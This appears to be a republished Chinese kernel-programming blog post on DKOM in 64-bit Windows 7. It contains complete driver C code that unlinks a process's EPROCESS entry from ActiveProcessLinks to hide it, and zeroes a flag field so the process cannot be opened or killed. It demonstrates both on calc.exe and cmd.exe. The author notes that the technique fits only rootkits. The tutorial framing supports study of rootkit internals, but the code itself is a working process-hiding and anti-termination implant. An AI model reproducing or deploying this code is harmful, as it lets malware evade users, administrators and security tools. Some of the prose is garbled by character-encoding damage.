DKOM隱藏和保護(hù)進(jìn)程

主要就是操作鏈表，以及修改節(jié)點(diǎn)內(nèi)容。

DKOM?隱藏進(jìn)程和保護(hù)進(jìn)程的本質(zhì)是操作?EPROCESS?結(jié)構(gòu)體，不同的系統(tǒng)用的時(shí)候注意查下相關(guān)定義，確定下偏移，下面的數(shù)據(jù)是以win7?64為例。

關(guān)?注?兩?個(gè)?成?員?：?ActiveProcessLinks?和?Flag?。

ActiveProcessLinks?把各個(gè)EPROCESS?結(jié)構(gòu)體連接成“雙向鏈表”，ZwQuerySystemInformation枚舉進(jìn)程時(shí)就是枚舉這條鏈表，如果將某個(gè)?EPROCESS?從中摘除，ZwQuerySystemInformation就無(wú)法枚舉到被摘鏈的進(jìn)程了，而依靠此函數(shù)的一堆?RING3?的枚舉進(jìn)程函數(shù)也失效了；而把Flag?置?0?后，OpenProcess?函數(shù)就會(huì)返回失敗。不過(guò)需要注意的是，用?用?DKOM??來(lái)保護(hù)進(jìn)程會(huì)有很大的隱患，比如用?調(diào)用?CreateProcess??會(huì)?失敗，而且?進(jìn)程?退出?但?不取消保護(hù)的話，有一定機(jī)率導(dǎo)致藍(lán)屏。一句話，DKOM??保護(hù)進(jìn)程?和?隱藏進(jìn)程?只適用于?ROOTKIT?，而不適用于正規(guī)軟件。實(shí)現(xiàn)隱藏進(jìn)程和保護(hù)進(jìn)程的代碼如下：

NTKERNELAPI NTSTATUS PsLookupProcessByProcessId(HANDLE ProcessId, PEPROCESS *Process); NTKERNELAPI CHAR* PsGetProcessImageFileName(PEPROCESS Process);//目標(biāo)進(jìn)程 PEPROCESS audiodg=NULL, dwm=NULL; ULONG op_dat;//偏移定義 #define PROCESS_ACTIVE_PROCESS_LINKS_OFFSET 0x188 #define PROCESS_FLAG_OFFSET 0x440//獲得EPROCESS PEPROCESS GetProcessObjectByName(char *name) { SIZE_T i; for(i=100;i<20000;i+=4) { NTSTATUS st; PEPROCESS ep; st=PsLookupProcessByProcessId((HANDLE)i,&ep); if(NT_SUCCESS(st)) { char *pn=PsGetProcessImageFileName(ep); if(_stricmp(pn,name)==0) return ep; } } return NULL; }//摘除雙向鏈表的指定項(xiàng) VOID RemoveListEntry(PLIST_ENTRY ListEntry) { KIRQL OldIrql; OldIrql = KeRaiseIrqlToDpcLevel(); if (ListEntry->Flink != ListEntry && ListEntry->Blink != ListEntry && ListEntry->Blink->Flink == ListEntry && ListEntry->Flink->Blink == ListEntry) { ListEntry->Flink->Blink = ListEntry->Blink; ListEntry->Blink->Flink = ListEntry->Flink; ListEntry->Flink = ListEntry; ListEntry->Blink = ListEntry; } KeLowerIrql(OldIrql); } //隱藏進(jìn)程 VOID HideProcess(PEPROCESS Process) { RemoveListEntry((PLIST_ENTRY)((ULONG64)Process+PROCESS_ACTIVE_PROCESS_LINKS_OFFSET)); }//保護(hù)進(jìn)程 ULONG ProtectProcess(PEPROCESS Process, BOOLEAN bIsProtect, ULONG v) { ULONG op; if(bIsProtect) { op=*(PULONG)((ULONG64)Process+PROCESS_FLAG_OFFSET); *(PULONG)((ULONG64)Process+PROCESS_FLAG_OFFSET)=0; return op; } else { *(PULONG)((ULONG64)Process+PROCESS_FLAG_OFFSET)=v; return 0; } }VOID test() { audiodg=GetProcessObjectByName("calc.exe");DbgPrint("calc: %p\n",audiodg); if(audiodg) { op_dat=ProtectProcess(audiodg,1,0); ObDereferenceObject(audiodg); } dwm=GetProcessObjectByName("cmd.exe");DbgPrint("cmd: %p\n",dwm); if(dwm) { HideProcess(dwm); ObDereferenceObject(dwm); } }

執(zhí)行結(jié)果：計(jì)算器結(jié)束不了，cmd.exe沒(méi)有進(jìn)程

但是cmd有這個(gè)：

?

總結(jié)

以上是生活随笔為你收集整理的Win64 驱动内核编程-21.DKOM隐藏和保护进程的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。